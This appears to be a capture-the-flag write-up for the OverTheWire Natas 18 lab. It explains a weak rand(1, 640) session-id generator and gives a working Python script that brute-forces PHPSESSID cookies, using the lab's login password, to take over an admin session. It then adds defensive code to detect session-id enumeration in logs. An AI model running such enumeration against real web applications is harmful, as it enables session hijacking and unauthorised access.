DISCLAIMER: The information in this site is for educational purpose only. The authors of this blog are not responsible for any kind of misuse of this information.

Thursday, December 12, 2013

OverTheWire Natas 18

First, let's inspect the source code: we can see that our target is to own a session whose 'admin' key is set to 1 in order to receive the credentials for the next level. The problem is that there is no way to add fields to our own session, except through the following function (whose success path is commented out) and its call:
function isValidAdminLogin() { /* {{{ */
    if($_REQUEST["username"] == "admin") {
    /* This method of authentication appears to be unsafe and has been
       disabled for now. */
        //return 1;
    }
    return 0;
}

...

$_SESSION["admin"] = isValidAdminLogin();
So instead of trying to manipulate our own session, let's try taking over the admin's session! The session id is generated by the following function:
function createID($user) { /* {{{ */
    global $maxid;
    return rand(1, $maxid);
}
where
$maxid = 640;
The function generates a random session id in {1, 2, ..., 640}, so the session id space is small enough for a brute-force attack to be feasible: at most 640 requests are needed to find the admin's live session.
import requests

# createID() draws ids from 1..640, so try each one as our PHPSESSID cookie.
for sessid in range(1, 641):
    r = requests.get('http://natas18.natas.labs.overthewire.org?debug=1',
                     auth=('natas18', 'xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP'),
                     cookies={'PHPSESSID': str(sessid)})
    if 'You are an admin' in r.text:
        print(r.text)  # will print next level credentials.
        break
Solved :)
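From the defender's side, the same arithmetic shows why this level falls and what the enumeration looks like in a web log. The following is an added example (not code from the level or from the original post): it computes the guessing cost of the 640-id space next to an assumed 128-bit session id, and flags any client that presents many distinct PHPSESSID values, using constructed log lines in a made-up format.

```python
import math
import re
from collections import defaultdict

# Regex over the constructed log format built below: client IP first,
# PHPSESSID inside a cookie="..." field. Adjust for a real server's format.
LOG_RE = re.compile(r'^(?P<ip>\S+) .*?PHPSESSID=(?P<sid>[^";\s]+)')


def brute_force_cost(id_space):
    """Requests needed to hit one live session id drawn uniformly from
    `id_space` possibilities: entropy in bits, expected and worst case."""
    return {"bits": math.log2(id_space),
            "expected_requests": (id_space + 1) / 2,
            "worst_case_requests": id_space}


def distinct_session_ids_per_client(lines):
    """Map each client IP to the set of PHPSESSID values it presented."""
    seen = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            seen[m["ip"]].add(m["sid"])
    return seen


def find_session_enumeration(lines, threshold=10):
    """Flag clients that presented more than `threshold` different session
    ids: a browser keeps reusing one id, an enumerator cycles through many."""
    seen = distinct_session_ids_per_client(lines)
    return {ip: len(ids) for ip, ids in seen.items() if len(ids) > threshold}


def make_sample_log():
    """Constructed log lines (not real traffic): one client walking the
    1..640 id space, one normal client reusing a single id."""
    fmt = '{ip} - - "GET /index.php HTTP/1.1" 200 cookie="PHPSESSID={sid}"'
    lines = [fmt.format(ip="10.0.0.5", sid=i) for i in range(1, 41)]
    lines += [fmt.format(ip="10.0.0.9", sid=417)] * 3
    return lines


if __name__ == "__main__":
    print(brute_force_cost(640))         # ~9.3 bits, 320.5 expected, 640 worst case
    print(brute_force_cost(2 ** 128))    # assumed size of a properly random session id
    print(find_session_enumeration(make_sample_log()))  # {'10.0.0.5': 40}
```

The fix on the application side is to stop deriving session ids from rand() and let PHP's own session handler generate them, which makes the worst-case request count astronomically large.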
